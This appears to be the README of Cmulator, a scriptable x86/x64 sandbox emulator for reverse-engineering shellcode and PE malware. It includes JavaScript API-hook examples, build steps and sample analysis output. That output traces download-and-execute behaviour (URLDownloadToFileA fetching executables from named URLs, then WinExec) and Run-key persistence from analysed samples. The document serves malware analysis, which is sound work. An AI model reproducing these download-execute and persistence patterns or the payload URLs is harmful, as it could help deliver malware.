

Cmulator - Scriptable x86 RE Sandbox Emulator (v0.3 Beta)

License: AGPL v3

<h2> <b> Cmulator is ( x86 - x64 ) <br>Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries <br> Based on Unicorn & Capstone Engine & javascript . </b>

💬 This is the last supported Pascal version and new code base (C/C++) will be in here Cmulator.

Supported Architectures:

Supported File Formats


<a style="color:red">Known problems</a>


Current Features

<br> <hr>

[+] Changelog

<br> <hr> <br>

Hook Example JavaScript

var GetModuleFileName = new ApiHook();
DWORD WINAPI GetModuleFileName(
  _In_opt_ HMODULE hModule,
  _Out_    LPTSTR  lpFilename,
  _In_     DWORD   nSize
GetModuleFileName.OnCallBack = function (Emu, API, ret) {

	Emu.pop(); // ret
	var hModule    = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
	var lpFilename = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
	var nSize	   = Emu.isx64 ? Emu.ReadReg(REG_R8D) : Emu.pop();

	var mName = Emu.GetModuleName(hModule);
	var Path = 'C:\\pla\\' + mName;

	var len = API.IsWapi ? Emu.WriteStringW(lpFilename,Path) : Emu.WriteStringA(lpFilename,Path);

	// null byte - mybe needed maybe not :D - i put it anyway :V 
	API.IsWapi ? Emu.WriteWord(lpFilename + (len * 2),0) : Emu.WriteByte(lpFilename+len,0);

	print("{0}(0x{1}, 0x{2}, 0x{3}) = '{4}'".format(

	// MS Docs : the return value is the length of the string
	Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, len);	
	Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);
	return true; // true if you handle it false if you want Emu to handle it and set PC .

GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameA');
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameW');

var _vsnprintf = new ApiHook();
int _vsnprintf(  
   char *buffer,  
   size_t count,  
   const char *format,  
   va_list argptr   
_vsnprintf.OnCallBack = function (Emu, API, ret) {

	// save the param to args
	// args is an Array and it's implemented in every ApiHook .
	_vsnprintf.args[0] = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.ReadDword(Emu.ReadReg(REG_ESP) + 4);

	// i think implementing this in JS is hard 
	// so just let the library handle it :D 
	return true; // True so we continue to the lib code .

// OnExit Callback ..
_vsnprintf.OnExit = function(Emu,API){
	// Read Our Saved Param .
	var buffer = _vsnprintf.args[0];

	warn("OnExit : _vsnprintf() = '{0}' ".format(

_vsnprintf.install('msvcrt.dll', '_vsnprintf');
<br> <hr>

Example Output :

<details><summary>AntiDebug Downloader</summary> <p>
Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 01:51:51
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"AntiDebugDownloader.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : AntiDebugDownloader.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000004000

[            Fixing PE Imports          ]

[*] File Name  : AntiDebugDownloader.exe
[*] Import 3 Dlls

[+] Fix IAT for : kernel32.dll

[+] Fix IAT for : urlmon.dll

[+] Fix IAT for : advapi32.dll


[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 52 Libraries ...

[>] Run AntiDebugDownloader.exe

0x401005 : IsDebuggerPresent = 0
GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows' 
0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0)
0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144
0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260)
0x40107a : RegCloseKey()

26 Branches - Executed in 9 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)

Press Enter to Close ¯\_(ツ)_/¯
</p> </details> <details><summary>x64 Down & Exec ShellCode</summary> <p>
Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"sc64.exe" is : x64
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : sc64.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000002000
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn

[            Fixing PE Imports          ]

[*] File Name  : sc64.exe
[*] Import 0 Dlls


[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 25 Libraries ...

[>] Run sc64.exe

LoadLibraryA('urlmon') = 0x70714000
GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10
0x40111b : URLDownloadToFileA(0, '', 'C:\\Users\\Public\\p.exe', 0, 2489880)
WinExec('C:\\Users\\Public\\p.exe', 0)

95 Steps - Executed in 295 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)

Press Enter to Close ¯\_(ツ)_/¯

</p> </details> <details><summary>x32 Down & Exec ShellCode</summary> <p>
Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"sc32.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : sc32.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000002000
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn

[            Fixing PE Imports          ]

[*] File Name  : sc32.exe
[*] Import 0 Dlls


[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 25 Libraries ...

[>] Run sc32.exe

GetProcAddress(0x70300000,'LoadLibraryA') = 0x703149D7
LoadLibraryA('urlmon.dll') = 0x7065a000
GetProcAddress(0x7065A000,'URLDownloadToFileA') = 0x706F08D0
GetProcAddress(0x70300000,'WinExec') = 0x70392C21
0x40113b : URLDownloadToFileA(0, 'https://rstforums.com/fisiere/dead.exe', 'dead.exe', 0, 0)
WinExec('dead.exe', 1)

3041 Steps - Executed in 415 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)

Press Enter to Close ¯\_(ツ)_/¯

</p> </details> <details><summary>Show SEH handling (PELock Obfuscator) </summary> <p>
Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe -ex

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"obfuscated.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : obfuscated.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers  : 0000000000001000
[*] Size Of Image    : 000000000000F000

[            Fixing PE Imports          ]

[*] File Name  : obfuscated.exe
[*] Import 2 Dlls

[+] Fix IAT for : KERNEL32.dll

[+] Fix IAT for : USER32.dll


[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 44 Libraries ...

[>] Run obfuscated.exe

EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 1, data value = 0x0
0x403031 Exception caught SEH 0x25FEEC - Handler 0x409215
ZwContinue -> Context = 0x25F97C
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x4056EC Exception caught SEH 0x25FEE8 - Handler 0x402516
ZwContinue -> Context = 0x25F978
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x401974 Exception caught SEH 0x25FEE4 - Handler 0x4019CE
ZwContinue -> Context = 0x25F974
MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x403A49 Exception caught SEH 0x25FEF4 - Handler 0x40A17B
ZwContinue -> Context = 0x25F984
EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0
0x40AD64 Exception caught SEH 0x25FEF4 - Handler 0x40B461
ZwContinue -> Context = 0x25F984

7387 Steps - Executed in 118 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)

Press Enter to Close ¯\_(ツ)_/¯

</p> </details> <details><summary>Hide SEH handling (PELock Obfuscator) </summary> <p>
Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe 

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"obfuscated.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : obfuscated.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 000000000000A4BD
[*] Size Of Headers  : 0000000000001000
[*] Size Of Image    : 000000000000F000

[            Fixing PE Imports          ]

[*] File Name  : obfuscated.exe
[*] Import 2 Dlls

[+] Fix IAT for : KERNEL32.dll

[+] Fix IAT for : USER32.dll


[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 44 Libraries ...

[>] Run obfuscated.exe

MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)

7387 Steps - Executed in 116 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)

Press Enter to Close ¯\_(ツ)_/¯

</p> </details> <br> <h3> And Try it Your Self , find it at "samples/obfuscated/obfuscated.exe" 😉 <hr> <br>

WIP BY Priority :


TODO BY Priority :







1. Build Cmulator

git clone https://github.com/Coldzer0/Cmulator.git

Open "Cmulator.lpi" with Lazarus IDE 

Then Hit Compile :D
Oh Before that you need to select the Build Mode

From Laz IDE Select 

Projects -> Project Options -> Compiler Options 

and Select the Mode for your OS .

Or Just Download From Releases


2. Create config.json config file

touch config.json

3. Set Win dlls Path

set the dll folders to where you stored your windows dlls and JS Main File .

  "system": {
    "win32": "../win_dlls/x32_win7",
    "win64": "../win_dlls/x64_win7",
    "Apiset": "../Apiset.json"
  "JS": {
  	"main": "../API.JS"


./Cmulator -file samples/AntiDebug.exe


Still working on it , will be available soon.


Acknowledgements & Resources :


this work inspired by :

Used OpenSource Projects :

Resouces Used :


With ❤️ From Home.